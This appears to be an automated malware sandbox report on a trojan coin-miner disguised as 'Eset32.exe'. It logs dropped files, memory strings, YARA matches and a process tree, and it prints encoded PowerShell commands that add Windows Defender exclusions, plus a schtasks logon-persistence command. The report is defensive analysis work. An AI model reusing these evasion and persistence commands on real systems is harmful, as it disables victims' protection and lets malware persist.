            Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.625526562.0000024F8D88F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.681492895.000002BE88B10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: 12.exe, 00000001.00000002.552111888.0000000003495000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000006.00000002.708101051.0000000006BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.501374621.0000021A936C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.624837713.0000024F8D681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.679354335.000002BE88901000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000001E.00000002.625526562.0000024F8D88F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000021.00000002.681492895.000002BE88B10000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: AppLaunch.exe, 00000006.00000002.705990964.0000000000402000.00000020.00000400.00020000.00000000.sdmpString found in binary or memory: http://www.codeplex.com/DotNetZip
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.entrust.net/rpa0
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: http://www.entrust.net/rpa03
            Source: System.exe, 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, System.exe, 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.gnu.org/licenses/
            Source: System.exe, 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jsonrpc.org/
            Source: powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: powershell.exe, 0000000A.00000002.501780713.0000021A938D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: System.exe, 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, System.exe, 0000001A.00000002.701782612.0000000018691000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/openwall/john/issues/3454#issuecomment-436899959
            Source: powershell.exe, 0000000A.00000002.510560064.0000021A948A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.511051451.0000021A94B38000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.511415597.0000021A94D18000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
            Source: powershell.exe, 0000000A.00000002.511738672.0000021AA3724000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://pidgin.im0
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://sectigo.com/CPS0
            Source: Eset32.exe, 00000000.00000002.429962678.000000000040A000.00000004.00000001.01000000.00000003.sdmpString found in binary or memory: https://www.digicert.com/CPS0
            Source: unknownDNS traffic detected: queries for: ip-api.com
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Source: C:\Users\user\Desktop\Eset32.exeCode function: 0_2_0040535C GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040535C

            System Summary

            barindex
            PE file contains section with special chars
            Source: 1.exe.0.drStatic PE information: section name: .5{mr
            Source: Eset32.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: 0000001A.00000002.701574814.00000000184D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
            Source: Process Memory Space: System.exe PID: 4512, type: MEMORYSTRMatched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, score = https://minergate.com/faq/what-pool-address, modified = 2021-10-26, nodeepdive =
            Source: C:\Users\user\Desktop\Eset32.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
            Source: C:\Users\user\Desktop\Eset32.exeCode function: 0_2_004069450_2_00406945
            Source: C:\Users\user\Desktop\Eset32.exeCode function: 0_2_0040711C0_2_0040711C
            Source: C:\Users\user\AppData\Roaming\12.exeCode function: 1_2_00007FF9F09BE5C21_2_00007FF9F09BE5C2
            Source: C:\Users\user\AppData\Roaming\12.exeCode function: 1_2_00007FF9F09BD8161_2_00007FF9F09BD816
            Source: C:\Users\user\AppData\Roaming\12.exeCode function: 1_2_00007FF9F09B85741_2_00007FF9F09B8574
            Source: C:\Users\user\AppData\Roaming\12.exeCode function: 1_2_00007FF9F09B05711_2_00007FF9F09B0571
            Source: C:\Users\user\AppData\Roaming\12.exeCode function: 1_2_00007FF9F09B15991_2_00007FF9F09B1599
            Source: C:\Users\user\AppData\Roaming\12.exeCode function: 1_2_00007FF9F09B15081_2_00007FF9F09B1508
            Source: C:\Users\user\AppData\Roaming\12.exeCode function: 1_2_00007FF9F09B05151_2_00007FF9F09B0515
            Source: C:\Users\user\AppData\Roaming\12.exeCode function: 1_2_00007FF9F09B2BC91_2_00007FF9F09B2BC9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 6_2_069C14646_2_069C1464
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 6_2_069CDEE06_2_069CDEE0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 6_2_069CBF806_2_069CBF80
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 6_2_069C1DA06_2_069C1DA0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 6_2_069C7D706_2_069C7D70
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 6_2_069C0B406_2_069C0B40
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 6_2_069CC8506_2_069CC850
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 6_2_069C08686_2_069C0868
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 6_2_069C155D6_2_069C155D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 6_2_069C20C86_2_069C20C8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 6_2_069C1E416_2_069C1E41
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 6_2_069CBC386_2_069CBC38
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 6_2_069C7D606_2_069C7D60
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 6_2_069C0B316_2_069C0B31
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 6_2_069C0B7A6_2_069C0B7A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 6_2_09826E3F6_2_09826E3F
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeCode function: 6_2_09826E406_2_09826E40
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF9F09B195810_2_00007FF9F09B1958
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF9F09B19E010_2_00007FF9F09B19E0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FF9F09B2C6810_2_00007FF9F09B2C68
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeCode function: 22_2_00007FF9F09C057122_2_00007FF9F09C0571
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeCode function: 22_2_00007FF9F09C857422_2_00007FF9F09C8574
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeCode function: 22_2_00007FF9F09C159922_2_00007FF9F09C1599
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeCode function: 22_2_00007FF9F09C150822_2_00007FF9F09C1508
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeCode function: 22_2_00007FF9F09C051522_2_00007FF9F09C0515
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeCode function: 22_2_00007FF9F09C2BC922_2_00007FF9F09C2BC9
            Source: 12.exe.0.drStatic PE information: No import functions for PE file found
            Source: sihost64.exe.26.drStatic PE information: No import functions for PE file found
            Source: System.exe.1.drStatic PE information: No import functions for PE file found
            Source: Eset32.exeVirustotal: Detection: 63%
            Source: Eset32.exeMetadefender: Detection: 14%
            Source: Eset32.exeReversingLabs: Detection: 59%
            Source: C:\Users\user\Desktop\Eset32.exeFile read: C:\Users\user\Desktop\Eset32.exeJump to behavior
            Source: Eset32.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Eset32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\Eset32.exe "C:\Users\user\Desktop\Eset32.exe"
            Source: C:\Users\user\Desktop\Eset32.exeProcess created: C:\Users\user\AppData\Roaming\12.exe C:\Users\user\AppData\Roaming\12.exe
            Source: C:\Users\user\Desktop\Eset32.exeProcess created: C:\Users\user\AppData\Roaming\1.exe C:\Users\user\AppData\Roaming\1.exe
            Source: C:\Users\user\AppData\Roaming\1.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\AppData\Roaming\1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
            Source: C:\Users\user\AppData\Roaming\12.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
            Source: C:\Users\user\AppData\Roaming\12.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe"
            Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windows\System.exe C:\Users\user\AppData\Roaming\Windows\System.exe
            Source: C:\Users\user\AppData\Roaming\12.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Windows\System.exe
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Windows\System.exe C:\Users\user\AppData\Roaming\Windows\System.exe
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess created: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe "C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe"
            Source: C:\Users\user\Desktop\Eset32.exeProcess created: C:\Users\user\AppData\Roaming\12.exe C:\Users\user\AppData\Roaming\12.exeJump to behavior
            Source: C:\Users\user\Desktop\Eset32.exeProcess created: C:\Users\user\AppData\Roaming\1.exe C:\Users\user\AppData\Roaming\1.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exitJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\12.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Windows\System.exeJump to behavior
            Source: C:\Users\user\AppData\Roaming\1.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "System" /tr "C:\Users\user\AppData\Roaming\Windows\System.exe"
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\Windows\System.exe C:\Users\user\AppData\Roaming\Windows\System.exe
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeProcess created: C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe "C:\Users\user\AppData\Roaming\Windows\Telemetry\sihost64.exe"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA="
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
            Source: C:\Users\user\Desktop\Eset32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\Eset32.exeCode function: 0_2_00403348 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403348
            Source: C:\Users\user\AppData\Roaming\12.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine, ProcessID from Win32_Process
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select CommandLine from Win32_Process WHERE CommandLine LIKE '%bqqlraak%'
            Source: C:\Users\user\Desktop\Eset32.exeFile created: C:\Users\user\AppData\Roaming\12.exeJump to behavior
            Source: C:\Users\user\Desktop\Eset32.exeFile created: C:\Users\user\AppData\Local\Temp\nse1954.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.evad.mine.winEXE@40/23@1/1
            Source: C:\Users\user\Desktop\Eset32.exeCode function: 0_2_0040216B CoCreateInstance,MultiByteToWideChar,0_2_0040216B
            Source: C:\Users\user\Desktop\Eset32.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\Eset32.exeCode function: 0_2_0040460D GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_0040460D
            Source: C:\Users\user\AppData\Roaming\12.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
            Source: C:\Users\user\AppData\Roaming\Windows\System.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll
